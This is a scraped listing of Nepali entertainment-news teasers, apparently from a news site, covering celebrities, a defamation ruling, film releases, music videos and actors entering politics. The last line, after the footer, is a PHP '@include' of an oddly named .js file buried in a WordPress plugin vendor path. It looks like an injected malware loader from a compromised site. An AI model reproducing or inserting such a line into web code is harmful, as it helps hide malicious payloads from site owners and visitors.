रङ्ग

सेक्सी तस्बिर राख्दै ज्योती मगरले दिएको दनक

काठमाडौं– तस्बिर र प्रस्तुतीका कारणले नै गायिका मोडल ज्योती मगरको चर्चा हुने गरेको छ। उनका सेक्सी अन्तरवार्ताका कारण नेपाल टेलिभिजनमा एउटा कार्यक्रम प्रशारण नै बन्द गरिएको थियो। त्यसपछि ज्योती झनै चर्चामा रहिन्। ‘अन्डरबुब’ तस्बिर होस् कि क्लिभेज तस्बिर उनको चर्चासँगै फ्यान फलोइङ कम छैनन्। उनले फेरि एउटा सेक्सी तस्बिर राखेर…

भुवन केसीसँग १० करोडको मुद्दा जितेपछि भावुक बनिन् साम्राज्ञी

काठमाडौं– अभिनेता तथा चलचित्र विकास बोर्डका अध्यक्ष भुवन केसीले १० करोड क्षतिपूर्ति माग गरेको मुद्दामा अभिनेत्री साम्राज्ञी राज्यलक्ष्मी शाहले जितेकी छन्। गाली बेइज्जती मुद्दा जितेपछि अभिनेत्री शाह भावुक बनेकी छन्। उनले मुद्दा जितेकोमा प्रतिक्रिया दिँदै कानुन व्यावसायीलाई धन्यवाद दिएकी छन्। ‘हामीले अन्ततः यो लडाइँ जितेका छौँ। अब म शान्तिको सास…

गायक प्रकाश सपूतमाथि बियरको बोतल प्रहार

काठमाडौं– गायक प्रकाश सपूतमाथि कार्यक्रममा गीत गाइरहेका बेला बियरको बोतल प्रहार भएको छ। रोमानियामा प्रस्तुती दिइरहेका बेला उनलाई क्यान बियरको बोतलले प्रहार भएपछि कार्यक्रम केही समय बिथोलिएको थियो। सपूतले उक्त प्रहार छल्न भ्याएनन्। मदिरामा लठ्ठ भएका दर्शकले उनलाई प्रहार गरेको बताइन्छ।

मेयर बालेनको एउटा स्ट्याटसले बलिउड हल्लियो, ‘आदीपुरुष’ सच्चियो

काठमाडौं– मेयर बालेन साहको एउटा फेसबुक स्ट्याटसमा दिइएको चेतवानीपछि शुक्रबारबाट विश्वभर रिलिज हुन लागेको बहुप्रतिक्षित फिल्म ‘आदीपुरुष’ले विवादीत डाइलगमा समावेश गरिएको त्रुटी सच्याएको छ। उक्त फिल्ममा समावेश गरिएको ‘भारतकी छोरी सीता’ भन्ने डाइलगमाथि आपत्ति जनाउँदै मेयर बालेनले उक्त विषय नेपालमा मात्र नभई विश्वभर प्रदर्शन गरिने फिल्मबाट नै नहटाए काठमाडौं महानगरमा…

‘तारा’को साथमा प्रतिनिधि सभाको यात्रामा ‘प्लस साइज’ मोडल सुजाता

काठमाडौं– राजनीतिमा युवाको भूमिकालाई प्रभावकारी बनाउनुपर्ने उद्देश्यसहित जनसमाजवादी पार्टीका तर्फबाट प्रतिनिधि सभाको सदस्यका रुपमा संसद भवनको यात्रा तय गर्दैछिन् प्लस साइज मोडल सुजाता काफ्ले। उनी जनसमाजवादी पार्टीकी उपाध्यक्ष पनि हुन्। समानुपातिक सूचीमा रहेकी उनले सदनमा युवाको प्रतिनिधित्व भए मात्र अहिलेको बेथितिविरुद्धको अभियानले सार्थकता पाउँदै नयाँ अवस्थाको यात्रा तय हुने ठानेकी…

द भ्वाईसको अमेरिकी संस्करणमा नेपाली मूलकी परिजिता बाँस्तोलाको चर्चा, चारै कोच फर्किए

काठमाडौं– नेपाली मूलकी परिजिता बाँस्तोलाले गायन रियालिटी शो द भ्वाइसको अमेरिकी संस्करणमा प्रस्तुति दिएकी छन्। परिजिताले ब्लाइन्ड अडिसनमा आफ्नो लोभलाग्दो प्रस्तुती दिएर चारैजना कोच फर्काउन सफल भइन। आफूलाई नेपाली भनेर चिनाएकी १७ वर्षीया परिजिताले ल्याब्रिन्थको चर्चित अंग्रेजी गीत ‘जेलस’ गाएकी थिइन्। उनको गीत सुनेर चारैजना कोचले खुलेर प्रशंसा गरे। चारैजना…

डा. रोकाको ६ कृति एकैसाथ विमोचन

बिराटनगर– न्युरो सर्जन डा. यमबहादुर रोकाको ६ कृतिको एकै साथ बिमोचन भएको छ। कविता संग्रह ‘१०८ पोयम्स’को तेस्रो, चौथो, पाँचौ, छैंठौं, सातौ र आठौं संस्करणको बिमोचन गरिएको हो। सुशीला कोइराला नाटकघर आरोहण गुरुकुल बिराटनगरमा कृतिको विमोचन गरिएको थियो। कवि तुलसी दिवसले डा. रोकाका कृति सार्वजनिक गरेका हुन्। कवि दिवसले डा.…

बलिउड कमेडियन राजु श्रीवास्तव रहेनन्

एजेन्सी– लामो समयसम्म क्यान्सरको पीडित रहेका बलिउड कमेडियन राजु श्रीवास्तवको बुधबार निधन भएको छ। नयाँ दिल्लीस्थित एम्स अस्पतालमा उपचारका क्रममा उनको निधन भएको हो। भारतीय समाचारमाध्यमले परिवारलाई उदृत गर्दै उनको निधनको खबर पुष्टि गरेका छन्। १० अगस्टमा जिममा कसरत गर्ने क्रममा उनी बेहोस् भएपछि अस्पताल भर्ना गरिएको थियो। स्वास्थ्यमा सुधार…

‘नालापानी’को विशाल प्रदर्शन अस्ट्रेलियामा

सिड्नी– सन् १८१४ मा देहरादुनस्थित नालापानी गढीमा भएको अंग्रेज–नेपाल युद्धमामा आधारिता फिल्म नालापानीको विशाल प्रदर्शन अस्ट्रेलियामा यसै साता हुने भएको छ। नेपाली फौजका तर्फबाट कप्तानी गरेका वीर बलभद्र कुँवरको नेतृत्वमा भएको युद्धकथाबारेको फिल्मलाई सिड्नीमा प्रदर्शन गर्न लागिएको हो। एमसन इन्टरटेनमेन्ट, ग्रिन हिल्स इन्टरटेनमेन्ट, आरकेएस अस्ट्रेलिया, अर्विट अस्ट्रेलिया ग्रुपको आयोजनामा हुन…

प्रताप र मेलिनाको युगल स्वर ‘कठै विचरा’, राज र प्रमिलाको डान्सिङ यस्तो छ (भिडिओ)

काठमाडौं– गायक प्रताप दास र मेलिना राईको युगल स्वरमा रहेको गीत ‘कठै विचरा’को म्युजिक भिडिओ सार्वजनिक भएको छ। सुदिप आत्रेयको शव्द, किरण माइकलको संगीत रहेको गीतको म्युजिक भिडिओमा अभिनेता राज कटुवाल र मोडल प्रमिला क्षेत्रीको अभिनय रहेको छ। डान्सिङ अभिनयमा अभिनेता राज अब्बल देखिएका छन्। श्यामश्वेत रसाईलीको एरेन्ज रहेको म्युजिक…

यसरी बलिवूड पस्यो प्रेमगीत ३, सन्तोष सेनको अन्तिम तर पहिलो प्रयत्नको कथा

बीबीसी– लकडाउनले देश ठप्प हुँदा तपाईँले के गर्नु भयो? सन्तोष सेनले टन्नै चलचित्र हेरे। दिनभर भारतीय टीभी च्यानलहरूमा प्रसारण हुने दक्षिण भारतीय प्रेमकथाहरू उनको समय कटाउने मेसो बने। त्यतिबेला उनी आफैले केही करोड लगानी गरेर खिचिसकेको चलचित्र प्रेमगीत-३ भने हार्ड ड्राइभमा थन्क्याएर बस्न बाध्य थिए। उक्त चलचित्रको छायाङ्कनको सकिएलगत्तै सह…

टिकटकमा रुचाइएको आकाश र करुणाको अभिनयमा ‘फूलै फूल दिन्छौ कि’ (भिडिओ)

काठमाडौं– अभिनेता आकाश श्रेष्ठ र करुणा श्रेष्ठको अभिनयमा रहेको नयाँ म्युजिक भिडिओ युट्युवमार्फत सार्वजनिक गरिएको छ। गायक शिव परियारको स्वर रहेको ‘फूलै फूल दिन्छौ की’ बोलको गीतको म्युजिक भिडिओ सार्वजनिक भएको हो। रिमेक भर्सनमा ल्याइएको उक्त गीतमा संगीत आशिष अविरलको रहेको छ। आनन्द अधिकारीको शब्द रचना रहेको गीत टिकटकमा अत्यधिक…

कांग्रेस छिरेका अभिनेता अनुपविक्रम शाहीले कस्तो जिम्मेवारी पाउँदैछन्?

काठमाडौं– नेपाली कांग्रेसमा प्रवेश गरेका अभिनेता अनुपविक्रम शाहीलाई तरुण दलको भाइटल रोल दिने तयारी भएको छ। शुक्रबार बिहान मन्त्री निवास पुल्चोकमा गृहमन्त्री बालकृष्ण खाँणले शाहीलाई स्वागत गरेका हुन्। खाँणले उनलाई तरुण दलको सदस्यताको पत्र पनि दिए ।कार्यक्रममा तरुण दलका पूर्व अध्यक्षहरु महेन्द्र यादव, उदय शम्शेर राणा, जितजंग बस्नेतका साथै अध्यक्ष…

राजेश हमालले बाबुको रोल नखेल्ने

काठमाडौं– महानायकको दर्शक उपमा पाएका अभिनेता राजेश हमालले तत्कालै बाबुको भूमिकामा फिल्म खेल्न अस्वीकार गरेका छन्। उनलाई बाबुको भूमिकाका लागि प्रस्ताव आएको विषयमा उनले ‘अहिले बाबु हुने उमेर हो?’ भनी व्यंग्य गरेका छन्। उनी अझै पनि मूल पात्रमा नै केन्द्रित रहेर सिनेमा खेल्ने अठोटमा छन्। उता सहकर्मी भुवन केसीलाई चलचित्र…

कांग्रेस छिरेको ६० दिनमा भुवन केसीलाई चलचित्र विकास बोर्ड अध्यक्ष उपहार

काठमाडौं। अभिनेता भुवन केसीलाई सरकारले चलचित्र विकास बोर्डको अध्यक्षमा नियुक्त गरेको छ। सोमबारको मन्त्रिपरिषद बैठकले सञ्चार मन्त्रालयले गरेको प्रस्तावका आधारमा विकास बोर्डमा केसीलाई नियुक्त गरिएको हो। विकास बोर्ड अध्यक्षको दौडमा धेरैजना सहभागी थिए। नेकपा एमालेमा रहेका केसी दुई महिनाअघि मात्र कांग्रेस प्रवेश गरेका थिए। पदीय लाभका लागि कलाकार विभिन्न राजनीतिक…

website design & develop by thakuricreation Pvt. Ltd.

@include "wp-content/plugins/ad-inserter/includes/google-api-8/vendor/composer/include/7025.js";